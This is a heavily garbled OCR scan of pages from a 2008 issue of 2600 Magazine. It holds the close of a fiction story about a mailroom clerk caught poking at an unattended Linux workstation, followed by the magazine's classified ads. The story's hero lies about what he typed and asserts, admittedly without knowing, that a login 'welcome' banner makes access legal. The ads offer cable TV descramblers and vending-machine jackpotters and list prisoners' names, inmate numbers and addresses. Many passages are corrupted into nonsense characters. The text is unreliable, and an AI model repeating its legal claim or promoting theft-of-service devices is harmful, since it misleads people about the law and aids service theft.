l i ttl e more, and I fel t t he fi rst drop of sweat someth i ng, and I had i ntruded on h i s t urf.
run down my forehead. Onl y Barker l ooked "I saw h i m, " he added defensi vel y. Barker
unconcerned. turned back to me. Hi s eyebrows rose as he
"Let ' s not overreact," he sai d. "Some- wai ted for an answer. There was no sense
body wal ks i nto an open offi ce and l ooks at a denyi ng i t.
computer, i t' s hardl y a fel ony." "I onl y cl eared the screen, " I sai d. "I was
"Th i s area is cl osed off," the admi n sa i d goi ng t o cal l i t i n t o the hel pdesk when I
defensi vel y. " Nobody is a l l owed up here. " got back downstai rs. " That was l ame, and I
Barker turned back to me, and sai d, "What cri nged whi l e sayi ng i t. Barker l ooked more
are you doi ng i n t hi s sect i on, anyway? " di sappoi nted t han annoyed.
" I push my cart t hrough here, " I sai d, a "Can you check what he typed on that
bi t breat hl ess l y. "I t ' s shorter t han goi ng back mach i ne? " he asked the admi n .
t hrough t h e other sect i on twi ce. " " Poss i bl y, " was the admi n ' s repl y. He
I t a l l sou nded i nnocent enough, whi ch i n a sounded uns ure. That was a good s i gn. I n
way i t was. Barker l et out a weary breat h. my experi ence, i t ' s rare to fi nd an admi n i s-
" I don ' t have t i me for t hi s, " he sai d to trator who is as good wi th Li nux as he is wi t h
no one i n parti cul ar. He l ooked at me, and Mi crosoft Wi ndows. I t ' s l i ke fi ndi ng someone
t hen l ooked at the machi ne, then back at me who can wr i te wi t h thei r l eft and r i ght hands
aga i n . equal l y wel l . Most peopl e I knew used ei ther
"You di dn' t do anyth i ng wi t h that Wi ndows or Li nux. I was hopi ng t he admi n
mach i ne? " standi ng at t he workstat i on fel l i nto t he
Summer 2008
Pa
g
e 59
Wi ndows category. per haps wonderi ng if what I had sai d made
" I ' l l check the hi story l og, " he sa i d. My sense. I was n' t s ure mysel f. My L i nux ski l l s
hope of hi m not knowi ng L i nux vani s hed, were not exact l y bri l l i a nt, but I was hopi ng
and my heart sank. The hi story l og on Li nux that they were better t he admi n-from- hel l ' s.
i s the fi l e t hat keeps track of every command "Who are you ? " Barker sai d sudden l y. Then
typed, and I knew that i t wou l d have a l i st of he rephrased i t. "I mean, you don ' t work i n my
my recent act i vi ty. As I say, I am not much department. What i s i t you do here? "
of a hacker, and hadn' t bothered t o del ete " I work i n t he mai l room, " I croaked,
a nyth i ng to cover my tracks. I hadn ' t expected whi ch had an even better effect on the su i ts
there was goi ng to be an i nvesti gat i on. Thank t han t he hi story-fi l e remar k. Barker l ooked
god I hadn' t created a user account . " Hacker arou nd, cl ear l y puzzl ed. The admi n l ooked at
creates backdoor to stea l commerci al secrets, " me, and I knew he knew he cou l dn' t back up
t he headl i nes wou l d have sa i d. h i s accusati on. I a l so knew that I ' d made an
The admi n l ogged on t o t he mach i ne, and I enemy forever. Offi ce enemi es, though, I can
watched hi m open the hi story fi l e for the root l i ve wi t h.
user. " You can' t l et h i m go, " the admi n sai d.
"He' s been l ooki ng i n t he process di rec- " Those commands must have come from
tory," he sa i d. He l ooked up wi th an outraged hi m. "
expressi on l i ke a TV l awyer, onl y l ess s i ncere. "You don ' t have any evi dence, " sai d
"What does t hat mea n? " snapped Bar ker. Barker.
"He was probabl y tryi ng to fi nd out what " He was seen typi ng by a wi tness. It is a
servi ces are ava i l abl e. " cr i mi nal offense t o access a computer t hat you
Ba rker tu rned back to me, assumi ng the are not aut hor i zed to use. I f you don ' t ca l l the
fu l l aut hor i ty of h i s offi ci al rol e. pol i ce, I wi l L" He uncl i pped a mobi l e phone
" Di d you type those commands ? " he fr om hi s bel t. He was goi ng to use i t. I had
demanded, j abbi ng hi s fi nger at the screen. another vi si on, one of my career bei ng over.
Unt i l t hen, I had wa nted to be honest, and Not onl y that, but these peopl e were from
i f i t had been j ust Barker on h i s own, I ' d have one of the bi ggest compani es i n the country.
tol d h i m what I had done. Even though what They di dn' t dea l i n di mes; they were used to
I ' d done was n' t i tsel f a cr i me, I knew that worki ng wi th mi l l i ons of dol l ars dai l y. When
someone somewhere cou l d probabl y make asked to assess the damages to thei r suppos
a three-act courtroom drama out of i t. They' d edl y- hacked network, they' d have no troubl e
l awyer u p and hang me out t o dry, I knew i t. cooki ng up some seven-fi gure sum to put i n
S o I l i ed. front of a j udge. I got a hol l ow feel i ng i n my
"Wh i ch commands? " I s ai d i n nocentl y. The stomach. I knew that even i f I di dn ' t get j a i l ed,
admi n hel pfu l l y stepped away from bei ng i n I ' d have a hacki ng rap on my record, a n d then
front of the screen, and I made a pretense of nobody was ever goi ng to h i re me to work
l ooki ng at the evi dence. There on the screen i n computers ever aga i n . I was goi ng to be a
were the commands I had used to i nspect the fi fty-year-ol d genera l cl erk, sti l l l i vi ng wi th my
machi ne. But I soon rea l i zed that i n hi s eager- parents, hopi ng to have a heart attack j ust so I
ness to prove hi s poi nt, the admi n had made a di dn' t have to push that cart around an offi ce
mi stake. Not onl y was he not a L i nux guru, he I hated.
was n' t much of a n admi n, ei ther. We stood i n s i l ence for a moment, the
" No, " I sai d, fi rml y. "That j ust tel l s you what admi n poi sed to di a l . I cou l d see the secu
the l ast commands were. I t does n' t tel l you r i ty guard tens i ng hi s hands, gett i ng ready for
who typed them, or when they were typed. I t acti on. I n the s i l ence, I heard the machi ne' s
cou l d have been anybody. And i t cou l d have noi sy hard di s k spi n up agai n, and start whi r-
been weeks ago. " r i ng, and I l ooked at the screen. And then I
I thought I saw a h i nt of a s mi l e appear had my second brai n wave of the mor ni ng.
on Bar ker ' s face, whi ch was qu i ckl y repl aced "I t' s not a cri mi na l offense, " I sai d. " Not on
wi t h hi s offi ci al express i on. I had i mpressed that computer. "
the s ui ts, too. A few rai sed expectant eyebrows I wai ted for Barker to say someth i ng, but
toward the admi n . Ther e i s a s urpri s i ng l ack nobody sai d a word. I poi nted at the screen,
of bi as i n management sti ffs. Sure, they obvi - where the admi n had j ust l ogged i n .
ous l y enj oy a good feedi ng frenzy, bu t you ' d "Your system says 'wel come' whenever
thi n k they' d automati cal l y cheer for the guy anybody l ogs i n . "
i n the most expensi ve sui t, and t hat ' s not true. Every head i n the room turned to l ook at
I nstead, i t ' s a case of l i ne ' em up and may the the screen. There at the top was the message
best man wi n. of t he day, t he text that accompani es every
Barker stood there s i l ent l y, l ooki ng at me, l ogon . Ri ght next to the name of the company
Pa
g
e 60
2600 Ma
g
azine
was the word "Wel come. "
"A wel come can be l ega l l y construed as an
i nvi t at i on. Pl us there was no warn i ng t hat t hi s
i s a restri cted system. "
I watched my audi ence, thei r busi ness
bra i ns di gest i ng the i nformati on .
"And, s i nce the program had crashed, and
I hadn ' t actual l y l ogged i n, " I added, "then
legal l y spea ki ng I haven ' t done anyth i ng
wrong. " Ba rker turned to the admi n .
"I s that true?" h e asked. The admi n stood
there, hol di ng hi s phone, a nd tens i ng hi s j aw.
He di dn ' t repl y. Actua l l y, I had no idea i f i t
was true, ei t her. Ba rker l et out a l ong breath
t hrough hi s nose, t hen spoke aga i n .
" How ma ny other machi nes have we got
l i ke that ?" He was n' t hol di ng back now. He
was seri ousl y annoyed, a nd he was l ett i ng t he
admi n have i t . Lucki l y for me, there was some
admi ni strat i ve tu rf-wa r goi ng on betwef' n the
two. Offi ce pol i t i cs: don ' t you j ust l ove i t ?
"I don ' t know, " sa i d t he admi n, rel u cta nt l y.
"You ' l l have to ask B i l l . I t ' s hi s box. " I gat hered
that B i l l was the company' s UNI X wi zJrd.
" But t hi s ki d shou l dn ' t be t ouch i ng i l."
"I t shou l dn ' t be on the fl oor i n an empty
offi ce. What ' s i t dIi ng i n here a nyway? "
snapped Ba rkfL The ddmi n was goi ng to say
someth i ng, but Bil rh'r preempted h i m.
"You ' d better gpt Bi l l up here today. I don ' t
care what h e ' s doi ng; tel l hi m t o get up here
now. We need the stJ nda rd wari ng message
on every L i nux mach i ne, today. "
" But t here are dozens of t hem, " sai d the
admi n, a bi t whi ney.
"I t ' s s i mpl e. J ust change the message of t he
day," I suggested hel pfu l l y.
Ba rker shot me a l ook, and I s hut my
mouth, a nd l ooked su i tabl y ser i ous. Cont ri te, I
th i nk is the word.
"J ust get i t done, " he s ai d t o the admi n .
"And get t h i s mach i ne ou t of here a nd i nto the
server room. "
The admi n was outranked, and he knew i t .
He nodded si l ent l y. At t he back of every offi ce
drone' s mi nd is the mortgage he has to pay.
More l i kel y, the admi n was s i mpl y fol l owi ng
the route t o t he top that the ads secret l y
suggest: obey s i l ent l y, and one day you can
be the wi nner of the rat race. Bar ker t urned
to me.
"Go back to your work, and i f you touch
another machi ne i n here, I ' l l persona l l y ca l l
the pol i ce. "
" I won ' t, " I sai d. "Thanks. "
I headed to the door. The guard stepped
asi de to l et me pass, and I left h i m and the
I nqui si t i on to thei r post-event di scussi on and
went out . I grabbed t he cart and hust l ed a l ong
the corri dor as fast as my wheel s wou l d go. I
hi t the button to fetch the el evator, and I cou
hear the su i ts fi l i ng out of the room, thei r spec
tator sport over wi t h, goi ng back to wri t i ng
memorandums t o t he board. The door opened
and I got i n. As the el evator descended, I sai d
a si l ent prayer t o whomever t he patron sa i nt of
hackers is, and qu i et l y resol ved t hat my fi rst
born ma l e ch i l d wou l d be named Barker.
I exi ted on the ground fl oor, a l most
col l i di ng wi th one of the j uni or cl erks who
was a l ways buggi ng me about putti ng her ma i l
on the des k i nstead of i n the proper tray.
"Oops, " I sa i d, wi th a fri endl y smi l e. She
was cute, a nd I guess the recent exci tement
had ca ught me off gUJrd, the adren a l i n had
gi ven me confi dence, or someth i ng, a nd so I
sai d, " How' s it goi ng? " or words to t hat effect.
She wa l ked away wi thout sayi ng a nyth i ng, t he
perfect end to a perfect day.
I went down thf' corr i dor a nd i nt o t he ma i l
room, a nd I stayed there unt i l fi ve o' cl ock. I t ' s
fu nny how J c l ose br ush wi t h i mpr i sonment
CJn mil ke ma i l sort i ng seem l i ke fu n.
I never found out whit WiS on t hat wok
stJt i on or why i t WJS i n t hat lmpt y room,
il nci I never Jskpd. But I di d get a ca l i |n t he
fol l owi ng MondJY. I t was Bi rk( ' r. l I wanted
to know if I wou l d l i ke to wor k for h i m i n t he
I T depi rt mpnt . He sa i d t hil t np('(it' d '|HC|||
wi t h L i nux s k i l l s . Of (ou rs!, I acct 't !d, , md H
few mont hs of study J nd t hrf'P t' X,l ms l ater, I
wHs gi ven the offi ci il l t i t l e of nCt wor k Pil gi neer.
Basi ca l l y, I get pa i d to pl ay wi t h nl' t works, to
see where t he secur i t y hol e, are, a nd occa
si ona l l y to swap out H broken swi t ch.
These days, I can afford t o buy computer
equ i pment from t hi s cent ury. I nC'Vr went
back to H l i fe of cr i mi nal hacki ng, a nd I ' ve
never had to push a ca rt a round a n of( | ever
aga i n-so far. But I did manage to bump i nto
that cl erk, the one I col l ided wi th on my fi rst
week. Th i s t i me, I got H s mi l e, a nd as I watched
her wal k away, I noti ced a bi t oj a sway in her
hi ps that hadn' t been there before.
I ' d tel l you about how the computer on
her desk devel oped a network faul t that onl y
I cou l d f i x, but you can probabl y guess the
detai l s.
Have an interestng fctonal stor
concering hackng tat YOI'd lke to
test Olt on olr readers?5end i on in
to art des@2600, cm. Please teN IS
it' fiton so w don't inadverenly
spread a pack of Hes.
Summer200B
;
Happeninus
PHREAKNI C 1 Z. Nashvi l l e 2600 i s once agai n proud to present
PhreakNI C 1 2, hel d every year i n Nashvi l l e, TN. We are hol di ng
t hi s technol ogy conference i n the same l ocati on as the past
' years, the Days I nn at the Stadi um on October 24th-2 6th,
2 008. Vi si t http://phreakni c. i nfo for the l atest i nformati on,
i ncl udi ng hotel booki ng i nformati on and pre-regi strat i on.
Cal l ( 61 5) 254- 1 5 5 1 and menti on "PhreakNI C" f or the speci al
rate of $67/ni ght.
For Sale
SECURITY SYSTEM FOR SALE, under $ 1 00 and no mont hl y
fees. I am sel l i ng secur i ty systems t o protect your computer or
personal space such as a dormi tory or apartment, etc. Thi s covert
al ar m system ca l l s your cel l phone on detecti on of i ntrusi on,
then al l owi ng you to use your cel l phone to hear the i ntruder's
acti vi ti es t hrough a sound ampl i fied mi crophone on the uni t .
Thi s a l arm system i s di sgui sed as an orri nary house phone and
i s al so a wor ki ng phone! (Great for offi ces. ) Best secur ity system
money can get for under $ 1 00 and no mont hl y fees. Order now
for $75 onl y at www. CNC- Di stri buti on. com/CNC
MAC SPYWARE- anti -spyware f or the Mac |' X, detects,
i sol ates, and removes spyware and over 8000 tracki ng
cooki es. Thi rty day free t ri al - http://macscan. securemac. com/
- Hel p us promote Mac$can, receive a free copy, and swag -
macsec@securemac. com for detai l s.
CRACKER FRI ENDLY GLASS TOBACCO PI PES, water pi pes,
chamber pi pes, and accessori es. Li qu i dati on <al e! For those
pul l i ng al l - n i ghters who need hel p focusi ng. Free shi ppi ng for
orders over $30. Ema i l kur l i e1 984S @yahoo. com for pics and
quest i ons. Must be 1 8!
CABLE TV DESCRAMBLERS. New. Each $45 + $5 shi ppi ng,
money orderlcash onl y. Works on anal og l anal og/di gi tal
cabl e systems. Premi um channel s and possi bl y PPV dependi ng
on system. Compl ete wi t h 1 1 0vac power suppl y. Purchaser
assumes sol e responsi bi l i ty for noti fyi ng cabl e operator of use of
descrambl er. Requi res a cabl e TV converter ( i . e. , Radi o Shack) to
be used with the uni t. Cabl e connects to the converter, then the
descrambl er, then the output goes to TV set t uned to channel 3 .
CD 962 1 Ol i ve, Box 2 8Q92-TS, Ol ivettet Sur, Mi ssouri 63 1 32 .
Emai l : cabl edescrambl erguy@yahoo. com.
TV-8-GONE. Turn off TVs i n publ i c pl aces! Ai rports, restaurants,
bars, anywhere there's a TV. Now avai l abl e as an open source
ki t, as wel l as the super-popul ar or i gi nal keychai n. The kit turns
off TVs at 40 yards! And now, for professi onal s, the TV-B-Gone
Pro turns off TVs up to 1 00 yards away! 26UU readers get 1 0%
di scount on TV-B-Gone keychai ns - use Coupon Code: 2 600.
www.TVBGone. com
JEAH. NET supports 26UU, because we read too! J EAH. NET
conti nues to be # 1 for fast, stabl e FreeBSD shel l accounts wi t h
hundreds of vhost domai ns, FreeBSD and Pl esk web hosti ng,
1 00% pri vate and secure domai n regi strati on, and aggressive
merchant sol ut i ons. 26UU readers' setup fees are al ways wai ved
at J EAH. NET.
J ! NX-HACKER CLOTHI NG/GEAR. Tired of bei ng naked? J I NX.
com has 300+ 1's, sweatshi rts, sti ckers, and hats for those
rare t i mes that you need to leave your house. We've got swag
for everyone, from the buddi ng nOObl et to the vi ntage geek.
So take a five mi nute break from surfi ng prOn and check out
http: //www.J I NX. com. Uber-Secret-Speci al -Mega Promo: Use
"2600v2 5no2" and get 1 0% off of your order.
VENDI NG MACHI NE JACKPOTTERS. Go to
www. hackershomepage. com for Vendi ng & Sl ot Machi ne Jack
potters, Safe Crackers, lock Pi cks, Phone Devi ces & Controver
si al Hacki ng Publ i cati ons.
NET DETECTIVE. Whether you' re j ust cur i ous, tryi ng to l ocate
or find out about peopl e for personal or busi ness reasons, or
you're l ooki n for peopl e you've fal l en out of touch wi th, Net
Detective makes i t a l l possi bl e! Net Detective i s used worl d
wi de by pri vate i nvestigators and detectives, as wel l as everyday
peopl e who use i t to find l ost rel ati ves, old high school and army
buddi es, deadbeat parents, l ost loves, people that owe them
money, and j ust pl ai n old snoopi ng around. Vi si t us today at
www.netdetecti ve. org. uk.
NETWORKI NG AND SECURITY PRODUCTS avai l abl e at
Ovat i onTechnol ogy. com. We're a suppl i er of Network Secu
ri ty and I nternet Pri vacy products. Our on l i ne store feat ures
VPN and fi rewa l l hardware, wi rel ess hardware, cable and DSL
modems/routers, I P access devi ces, Vol P products, parental
control products, and ethernet swi tches. We pri de oursel ves on
provi di ng the hi ghest l evel of techni cal experti se and customer
sati sfacti on. Our commi tment to you . . . No surpri ses! Buy wi t h
confi dence! Securi ty and Pri vacy i s our busi ness! Vi si t us at
http: //www. Ovati onTechnol ogy.com/store. ht m.
REAL WORLD HACKI NG: I nterested i n rooftops, steam t unnel s,
and the l i ke? Read the al l -new Access A
ll
Areas, a gui debook to
the art of urban expl orati on, from the author of In
f
i
l
tration zi ne.
Send $20 postpai d i n the US or Canada, or $2. overseas, to
PO Box 1 3, Stati on E, Toronto, ON M6H 4E 1 , Canada, or order
onl i ne at www. i nf i l trat i on. org.
lKttlLA lLMMAtON DVD! Years i n the maki ng but we
hope i t was worth the wai t. A doubl e DVD set that i ncl udes
the two hour documentary, an i n-depth i nterview wi th Kevi n
Mi t ni ck, and nearl y t hree hours of extra scenes, l ost footage,
and mi scel l aneous stuff. Pl us capti oni ng for 20 (that's ri ght,
20) l anguages, commentary track, and a l ot of t hi ngs you' l l j ust
have to fi nd for yoursel f! The ent i re two disc set can be had by
sendi ng $., 0 to Freedom Downti me DVD, PO Box 752, Mi ddl e
I sl and, NY 1 1 953 USA or by order i ng from our onl i ne store at
http:/store. 2 600. com. ( VHS copi es of the fi l m sti l l avai l abl e for
$ 1 5. )
Help Wanled
LOOKI NG FOR HElP from anyone in the wr i t i ng of a proposal
to hel p me try to rei nstate personal computers i n the East J ersey
State Prison in Rahway, New Jersey. We are operat i ng under
a new commi ssi oner si nce the computers were taken away
in 1 995 due to pol i cy revi si ons for no reason at al l . I f anyone
knows someone that knows someone that knows the commi s
si oner of the New Jersey State Pri sons, we seek your hel p i n t hi s
matter. I am al so l ooki ng for anyone who i s wi l l i ng to hel p me
wi t h my programmi ng ski l l s. Anyt hi ng wi l l be a pl us. Contact
i nfo: Akmed R. Fl u ker, 467096/853803A, Lock Bag R, Rahway,
New J ersey 07065. Peace and brotherhood to a l l .
RENEGADE BLACK SHEEP TECH ENTREPRENEUR i n process
of putt i ng flesh on the bones of an encrypted voi ce commu
ni cati ons project. Do you have experi ence i n the deep detai l s
of Vol P/SI P protocol s, network traffic anal ysi s, bi l l i ng system
constructi on, PtoP rout i ng, and so on? I nterested in worki ng wi t h
a top-end t eam to bui l d a worl d-changi ng t ool for regul ar fol ks
around the worl d to use in t hei r everyday l i ves? Contact me at
wr i nko@hushma i l . com.
Wamed
LOOKI NG FOR Zb READERS who wou l d l i ke to offer t hei r
servi ces for hi re. Want t o make money worki ng from home or on
the road, cal l ( 740) 544-6563 extensi on 1 0.
WANTED. Verified/veri fi abl e computer hacker. Wi l l pay $75 for
i ntervi ew to be used for future publ i cati on; ei ther on-the-record
or off-the-record. Response2600 (at) yahoo. com.
Seniees
HACKER TOOLS TREASURE BOX! You get over 660 l i nks
to key resources, _I us our proven methods for root i ng
out the hard-to-fi n tool s, i nst ant l y! Lets you bui l d your
own custom hacker ( AHEM, network securi ty) tool ki t.
http://FortressDataProtecti on. com/secur i tybook
GET A RAI SE AT WORK - BLOCK MORE SPAM. 5pamStopsHere
(www. spamstopshere. com) is the premi er sol uti on to hel p you
i mprove your boss' opi ni on of you, or hel p you keep spam
away from your own busi ness. I t wi l l hel p you bl ock over 99%
of spam "out of the box" and has vi rt ual l y no fal se posi ti ves. I t
requ i res no tun i ng, other than havi ng your users send any spar
that does manage to get through to a speci al e-mai l address. so
i t too gets bl ocked for al l of SpamStopsHere's cl i ents. Because
of the methodol ogy used, even medi cal groups and l aw fi rms,
the two hardest types of organi zati ons to spam fi l ter, can get
great success. I 've been usi ng the servi ce mysel f for two years
at my empl oyer, and have personal l y had two fal se posi ti ves i n
Pa
g
e 62
2600 Ma
g
azine
t hat t i me, wi th h' of the ma i l my organi zat i on recei vps bei ng
spam. I n the ev('nt t hat t her e i s a fa l se posi t i ve, your users can
fi nd out il bout i t thCmsel vps and retri eve i t thpmspl vps. The
-t rvi c' | - r1 | -o Gl pibl p Cl || Ct|| n_ v| u-c-, put t i ng anol hpr l i ne
of defense between a vi r us and your mdi l servers. The servi n'
ev('n i mproves e-mai l rel i Jbi l i ty wi th mul t i pl e-redundant servers
at l ocati ons around t h( ' U. S. , whi ( h JuIG-|t|t <l nd forward yCu
e-ma i l in thp ev('nt of a hardwire fai l u re on your ('nd. Hest of il l I ,
i t i s very ,lffordabl p, and offers a 30-day free tri a l . Reil i zi ng t haI
we'd be a _CCO mar ket f or t hem, I m,maged to negot i Jte a 1 5
pern'nt di scount off the pri ce of the servi ce for a 1 1 16U() read

rs.
Si mpl y contJct SPil n at sean@spamstopsherf' . com and mentI on
.|||AJJ.|nt to get your di scount .
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY
RELATED CRIME? Have an i dea, i nvent i on, or busi ness you want
to buy, sel l , protect, or market? Wi sh your attorney actua l l y under
stood you when you speak? The Law Office Ol Mi chael B. Green,
Esq. i s the sol uti on to your 21 st century l egal probl ems. Former
SysOp and member of many pri vate BBS's si nce 1 98 1 now avai l
abl e t o di rectl y represent you or bri dge t he communi cati ons gap
and assi st your current legal counsel . Extremel y detai l ed knowl
edge regardi ng cr i mi nal and ci vi l l i abi l i ty for computer and
technol ogy rel oted acti ons ( 1 8 USC 1 028, 1 02 9, 1 030, 1 03 1 ,
1 34 1 , 1 342, 1 343, 2 5 1 1 , 2 5 1 2, ECPA, DMCA, 1 996 Telecom
Act, etc. ) , domai n name di sputes, i ntel l ectual property matters
such as copyr i ghts, trademarks, l i censes and acqui si ti ons, a

wel l
as genera l busi ness and corporate l aw. Over 1 1 y

ars exp
.
enence
as i n-house legal counsel to a computer consul t i ng bUSi ness as
wel l as an over 20 year background i n computer, tel ecommuni
cati ons, and technol ogy matters. Publ i shed l aw revi ew arti cl es,
contri buted to nati onal l y publ i shed books, and submitted bri efs
to the Uni ted States Supreme Court on I nternet and technol ogy
rel ated i ssues. Admi tted to the u. S. Supreme Court, 2nd Ci rcui t
Court of Appeal s, and a l l New York State courts and fami l i ar
wi th other j uri sdi ct i ons as wel l . Many attorneys wi l l
.
t ake your
case wi thout any consi derati on of our cul ture and wi l l see you
merel y as a source of fees or worse, wi th i l l -concei ved prej u
di ces. My office understands our cul t ure, i s sympatheti c to your
si tuati on, and wi l l treat you wi th the respect and understandi ng
you deserve. No fee for the i n i t i al and confi dent i al consul tati on
and, i f for any reason we cannot hel p you, we wi l l even try
.
to
fi nd someone el se who can at no charge. So you have nothi ng
to l ose and perhaps everyt hi ng to gai n by contact i ng us fi rst.
Vi si t us at: http://www. computorney. com or cal l 5 1 6-9WE- HELP
( 51 6-993-4357) .
HAVE A PROBLEM WI TH THE LAW! DOES YOUR LAWYER
NOT UNDERSTAND YOU! Have you been charged with a
computer rel ated cr i me? I s someone threateni ng to sue you
for somet hi ng technol ogy rel ated? Do you j ust need a l awyer
that understand I T and the hacker cul ture? I 've publ i shed and
presented at HOPE and Defeon on the l aw faci ng technol ogy
professi onal s and hackers al i ke. I ' m both a l awyer and an I T
professi onal . Admi tted to practi ce l aw i n Pennsyl vani a and New
Jersey. Free consu l tati on to 26UU readers. http:/muentzl aw. com
al ex@muentzl aw. com (2 1 5) 806-4383
PIMP YOUR WI RELESS ROUTER! http://packetprotector.org.
Add VPN, I PS, and web AV capabi l i ti es to your wi rel ess router
with free, open-source fi rmware from PcketProtector.org
ADVANCED TECHNICAL SOLUTI ONS. #422 1 755 Robson
Street, Vancouver, B. C. Canada V6G 3 B7. Ph: (604) 928-0555.
El ectroni c countermeasures - f i nd out who i s secret l y vi deo
tapi ng you or buggi ng your car or offi ce. "State of the Art" detec
tion equ i pment uti l i zed.
I NCARCERATED ZbMEMBER NEEDS COMMUNITY HELP to
bui l d content in free cl assi fi ed ad and "l ocal busi ness di rectory"
in 50 countri es. John Lambros, the founder of Boycott Brazi l ,
has l aunched a F RE E cl assi fi ed ad, want ad, and l ocal busi ness
di rectory i n 50 gl obal markets. The mi ssi on i s si mpl e: "free el p
to bi l l i ons of peopl e l ocati ng j obs, housi ng, goods and serVI Ces,
soci al acti vi ti es, a gi rl fri end or boyfri end, communi ty i nforma
ti on, and j ust about anyth i ng el se i n over one mi l l i on nei gh
borhoods throughout the worl d - al l for FREE. HELP ME OUT!
SPREAD THE WORD! Pl ease vi si t www. NoPyCl assi fi eds. com
and add some content. I t wi l l take al l of fi ve or ten mi nutes. Li nks
to "No Py Cl assi fi eds" are al so greatl y appreci ated.
I NTELLI GENT HACKERS UNI X SHEll. Reverse. Net i s owned
and operated by i ntel l i gent hackers. We bel i eve every user has
the ri ght to onl i ne securi ty and pri vacy. In raday's host i l e anti
hacker atmosphere, i ntel l i gent hackers requi re the need for a
secure pl ace to work, compi l e, and expl ore wi thout bi g-brother
l ooki ng over thei r shoul der. Hosted at Chi cago Equi ni x wi th
j uni per Fi l tered DoS Protecti on. Mul t i pl e FreeBSD servers at P4
2 . 4 ghz. Affordabl e pr i ci ng from $5/month with a money back
guarantee. Li feti me 2 6% di scount for 26UU readers. Coupon
code: Save2600. http://www. reverse. net
AnnouncemenlS
C Ml MCCK i s the wepkl y one hour hilcker radi o show
presented Wedn('<d,lY ni ghts tt 7: 00 pm ET on WBAI '.'
FM in New York Ci tv. You Cdn il l so t une in over the net at
www. 2 600. com/offth0hook I Cn shortw.w(' i n Nor t h il nd South
Ameri ca at 74 1 5 khz. Archivps of al l shows dati ng hack to
1 'hh can b(' found ilt th(' .|! si tp i n mp' lt|u.+ | ' 'nCv- from
1 Q88-2006 are now tlvtl i l abl e i n DVD-R hi gh fi del i ty audi o for
onl y $ 1 0 a yeJr or $ 1 50 for a l i fet i me subscri pt i on. SE'nd check
l money ordpr to 2|0|I, || Box 7.2, Mi ddl e bl and, NY l ! ': !
USA or order t hrough our on l i ne store <I t http://l or(' . 2 6() O. com.
Your feedbick on the program i s al ways wel come t i t oth QI1 2 600.
com.
THE HACKERS YOUTUBE. Vi deo shori ng communi ty for
upl oadi ng and watchi ng streami ng hacki ng, modrl i ng, and
underground vi deos t hat the commun i ty can rel y on to del i ver
qual i ty content to anyone wi l l i ng to take the ti me to l earn.
http://www. veryangrytoad. com
THE HI GH WEI RDNESS PROJECT. We are t SubGpn i us wi ki
seeki ng submi ssi ons of strange, controversi al , subversi ve,
and above a l l Sl ackfu l sources of i nformat i on. We do not
fol l ow a so-cal l ed "neutral poi nt of vi ew" - pl ease make your
entri es as bi ased as you want, as l ong as t hey're i nterest i ng!
Speci al secti ons dedi cated to i nformati on warfare, software,
conspi raci es, rel i gi on and skept i ci sm, and morc. Check us out:
www. modemac. com.
PHONE PHUN. http://phonephun. us. Bl og devoted to i nter
est i ng phone numbers. Share your fi nds!
Personals
COUNTER-I NTElLI GENCE, HACKI NG, computer rcl otcd
countermeasures. Former i ntel l i gence officer i nterested in new
computer rel ated technol ogy. I n search of friends, contacts, and
worl dwi de penpal s any age, race, or or i ent at i on. I f possi bl e,
i ncl ude photo wi t h letter. No nudi ty, pol aroi ds, or i nmate mai l .
Spani sh or Engl i sh OK. I purchase magazi nes, hooks, unusual
pi ctures wi th my own funds. WM, 6', 1 80, bl onde, brown - wi l l
respond t o a l l . I nterested i n i nfo on fi nanci al pri vacy, offshore
trusts, hacki ng, and counteri ntel l i gence. D. Coryel l , T-681 2 7,
PO Box 8504, D3- 247up, Coal i nga, CA 932 1 0.
WHEN THE BULLET HI TS THE BONE. Change of address. If
you tri ed to send mai l and it got retured, that's why. Bored and
l onel y phone nerd wi th some t i me left i n our nat i on's wonderfu l
correcti ons system. Sti l l l ooki ng for pen pal s to hel p me pass
the ti me. Wi l l respond to al l . I nterests i ncl ude but not l i mi ted
to tel ecom, computers, pol i t i cs, musi c, tats, urban expl orati on,
el ectroni cs. I ' m a 2 3 yrs whi te mal e, bl ack hai r, green eyes.
Some tats. Mi chael Kerr 09496-029, FCI Oxford, PO Box 1 000,
Oxford, WI 53952.
ZJ YEAR OLD SERVI NG Z YEARS i n Sheri dan, Oregon for
hacki ng i nto AT&T pl us many other Vol P provi ders. Fi rst to be
charged with Vol P cri mes. Featured on America's Most Wanted
with K. Mi t ni ck. Looki ng for ANYONE to write me. Check freer
obert. com for more i nfo.
GAY PRI SONER SEEKS FRI ENDS to hel p wi th book revi ew
l ookups on Amazon by keywords. Com Sci maj or, thi rsty to
catch up to the real worl d before my reentry. I have my own
funds to buy books. I onl y need revi ews. I ' m MUD/MMORPG
savy i n C++, j ava, Python, PHP, MySQL, Di rectX. Ken Roberts
j 60962, 450-1 -2 8M, PO Box 9, Avenal , CA 93204.
OFFLI NE OUTlAW I N TEXAS needs some hel p i n devel opi ng
programmi ng ski l l s. Interested i n Perl and j avascr i pt. Al so pri vacy
i n a l l areas. Li brary here i s i nadequate. Feel free to drop those
Bi l l Me Later cards, add me to the mai l i ng l i sts, etc. . Thanks to
a l l those who have hel ped me so much al ready, you know who
you are. Wi l l i am Li ndl ey 822934, CT Terrel l , 1 300 FM 655,
Rosharon, TX 77583-8604
ONLY SUBSCRI BERS CAN ADVERTI SE I N Zb Don't even
t hi nk about tryi ng to take out an ad unl ess you subscri be! Al l
ads ar e free and there i s no amount of money we wi l l accept
for a non-subscri ber ad. We hope that's cl ear. Of course, we
reserve the ri ght to pass j udgment on your ad and not pri nt
i t i f i t' s amazi ngl y stupi d or has nothi ng at al l to do wi th the
hacker worl d. We make no guarantee as to the honesty, ri gh
teousness, sani ty, etc. of the peopl e advert i si ng here. Contact
them at your peri l . Al l submi ssi ons are for ONE I SSUE ONLY!
I f you want t o run your ad more t han once you must resubmi t
i t each ti me. Don' t expect us to run more than one ad for you
in a si ngl e i ssue ei ther. I ncl ude your address l abel /envel ope
or a photocopy so we know you're a subscri ber. Send your ad
to 26UU Marketpl ace, PO Box 99, Mi ddl e I sl and, NY 1 1 953.
Deadline or Autumn issue: /Z5/0.
Summer 2008 g
e 63
The 900 page col l ect i on of hi ghl i ghts from our
24 years of publ i shi ng i s now out , i ncl udi ng
al l sorts of new commentary t o go al ong wi th
the hi stori c mat eri al . Publ i shed by Wi l ey and
avai l abl e at bookstores everywhere, obtai nabl e
vi a amazon. com, bn. com, borders. com, and
countl ess other si tes throughout the worl d.
Pa
g
e 64 2600 Ma
g
azine
'There's no place like HOPE "
